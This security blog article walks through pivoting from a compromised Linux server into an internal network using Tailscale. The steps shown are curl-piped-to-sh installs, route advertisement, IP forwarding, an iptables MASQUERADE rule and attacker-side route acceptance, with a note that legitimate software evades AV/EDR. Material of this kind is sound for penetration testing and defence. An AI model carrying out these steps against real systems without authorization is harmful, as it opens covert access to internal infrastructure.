Defect VIP: Pivoting on Linux with TailScale
In this article, I will demonstrate a method of pivoting on Linux using TailScale to get into the internal infrastructure. One of the Living off the land techniques.
Pivoting is one of the post-exploitation processes where an attacker tries to expand its presence in the network infrastructure. In this article, I will demonstrate a method of pivoting on Linux using TailScale to get into the internal infrastructure
Caster - Defect VIP
Genre: Offensive
Label: exploit.org
Release Date: 8 April 2024
Intro
Tailscale - is a solution for creating virtual VPN networks using Wireguard. It has no NAT issues and does not require account creation or certificates. Once again I use the concept of LOTL (Living off the land) in which the attacker presses his offensive vectors using legitimate software and TailScale is one of them.
Pivoting is one of the stages of post-exploitation. This article is actually a continuation of the first part of Defect, but in this VIP (Variation in Production) version I will demonstrate pivoting on Linux
Disclaimer
The article is of an introductory nature and is intended for security professionals conducting testing under contract. The author and editorial staff are not liable for any harm caused by the use of the information presented. The distribution of malware, disruption of systems, and violation of correspondence secrecy will be prosecuted.
Remarks
- TailScale is legitimate software, so there will be no problems with AV/EDR
- In this scenario, the attacker is on the Internet and has accessed an external infrastructure server
- You need root to install TS
- Enabling forwarding is not enough, you'll also need NAT manipulation
- To create a TS virtual network, you will need to create an account, but I won't describe this process. Because it's too easy
Scheme
I came up with this scenario to make a scheme for the article. The attacker and the victim are on the internet. Through the victim, the attacker will enter the internal infrastructure
Deploy TailScale on a compromised server
There are many ways to do this, but I'll choose the easiest one. Exclusively to demonstrate the practical article of my article
curl -fsSL https://tailscale.com/install.sh | sh
You need to log into your account and confirm the host in your account:
root@outside:~# tailscale login
To authenticate, visit:
https://login.tailscale.com/a/19f24987014968
This link can be accessed from any computer, the main thing is that all the members of the TS network should be under this account. You can also use authentication keys instead of using links.
root@outside:~# tailscale login
To authenticate, visit:
https://login.tailscale.com/a/19f24987014968
Success.
After connecting to the TailScale network, a new virtual interface will appear. The address with the public address is hidden. I only show the virtual interface and the physical interface that the attacker will get into the network.
3: ens36: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:4f:ec:fd brd ff:ff:ff:ff:ff:ff
altname enp2s4
inet 10.10.140.128/24 brd 10.10.140.255 scope global dynamic noprefixroute ens36
valid_lft 1586sec preferred_lft 1586sec
inet6 fe80::20c:29ff:fe4f:ecfd/64 scope link noprefixroute
valid_lft forever preferred_lft forever
5: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 100.111.71.116/32 scope global tailscale0
valid_lft forever preferred_lft forever
inet6 fd7a:115c:a1e0::4101:4774/128 scope global
valid_lft forever preferred_lft forever
inet6 fe80::4be:2916:ecaf:ea9/64 scope link stable-privacy
valid_lft forever preferred_lft forever
Now we need to activate TailScale and announce the route. On the external server there is a second interface with internal addressing 10.10.140.0/24
, it should be announced.
10.10.140.0 0.0.0.0 255.255.255.0 U 100 0 0 ens36
root@outside:~# tailscale up --advertise-routes=10.10.140.0/24
If there are more networks behind the host, more subnets can be announced. It all depends on the individual network infrastructure characteristics
Now this route announcement needs to be confirmed in the control panel
Routing & NAT
In order for an attacker to get into the internal network infrastructure through a compromised server, routing must be configured. Only for this routing enablement to work even after reboot you need to uncomment the net.ipv4.ip_forward=1
line in the /etc/sysctl.conf
file
root@outside:~# sysctl -w net.ipv4.ip_forward=1
Also, due to the way TailScale works, the Firewall has automatically loaded NAT rules so that the TS network can go to the internal 10.10.140.0/24
network
root@outside:~# iptables -t nat -vL
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
3329 243K ts-postrouting all -- any any anywhere anywhere
Chain ts-postrouting (1 references)
pkts bytes target prot opt in out source destination
522 31560 MASQUERADE all -- any any anywhere anywhere mark match 0x40000/0xff0000
However, take care of the NAT settings on the compromised host anyway. For example, this rule can pass to the network behind the ens36
interface. This is a very important aspect of the configuration, if it is not taken into account, an attacker will not be able to get into the internal network. Take everything into account and work with NAT as you need.
root@outside:~# iptables -t nat -A POSTROUTING -o ens36 -j MASQUERADE
Configuration on the compromised server is complete.
Attacker
The task is simple, install TS, connect to the TS virtual network, receive the route, get into the internal infrastructure behind the compromised host
caster@kali:~$ curl -fsSL https://tailscale.com/install.sh | sh
caster@kali:~$ sudo tailscale up
[sudo] password for caster:
To authenticate, visit:
https://login.tailscale.com/a/1fe0432c01fe42
caster@kali:~$ sudo tailscale up
[sudo] password for caster:
To authenticate, visit:
https://login.tailscale.com/a/1fe0432c01fe42
Success.
Some peers are advertising routes but --accept-routes is false
Now we need to take the previously announced routes
caster@kali:~$ sudo tailscale up --accept-routes
Impact
The attacker now has network connectivity to the 10.10.140.0/24
network behind the compromised host. This is pivoting.
Proof
Specifiсs
Due to the use of the TailScale virtual network, small delays are possible, but they should not interfere much with the attacker. However, it is not recommended to run high-speed scanners inside the tunnel, as the tunnel can be easily broken.
caster@kali:~$ ping 10.10.140.131
PING 10.10.140.131 (10.10.140.131) 56(84) bytes of data.
64 bytes from 10.10.140.131: icmp_seq=1 ttl=127 time=161 ms
64 bytes from 10.10.140.131: icmp_seq=2 ttl=127 time=161 ms
64 bytes from 10.10.140.131: icmp_seq=3 ttl=127 time=216 ms
64 bytes from 10.10.140.131: icmp_seq=4 ttl=127 time=236 ms
64 bytes from 10.10.140.131: icmp_seq=5 ttl=127 time=165 ms
64 bytes from 10.10.140.131: icmp_seq=6 ttl=127 time=157 ms
64 bytes from 10.10.140.131: icmp_seq=7 ttl=127 time=182 ms
64 bytes from 10.10.140.131: icmp_seq=8 ttl=127 time=166 ms
Outro
This article is a continuation of the first version of my "Defect" article. Here I demonstrated the post-exploitation process on Linux using TailScale and gaining access to the internal infrastructure
Stay updated and engage with us on security discussions by joining our Telegram channel: @exploitorg